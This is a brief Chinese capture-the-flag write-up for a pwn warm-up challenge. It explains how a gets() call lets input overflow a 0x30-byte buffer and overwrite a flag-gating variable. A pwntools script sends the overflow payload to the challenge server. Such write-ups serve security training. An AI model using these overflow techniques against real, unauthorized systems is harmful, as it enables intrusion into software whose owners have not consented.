一道pwn的签到题
v4的长度为0x30-4,使用的是gets函数读取输入,所以可以溢出
只要满足v5不等于0就可以拿到flag,于是通过溢出修改v5的值即可
from pwn import *
from LibcSearcher import *
from struct import pack
context.os='linux'
context.arch='amd64'
context.log_level='debug'
sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)
io=remote('chall.csivit.com',30001)
#io=process('./pwn-intended-0x1')
elf=ELF('./pwn-intended-0x1')
ra()
sl('a'*0x30)
io.interactive()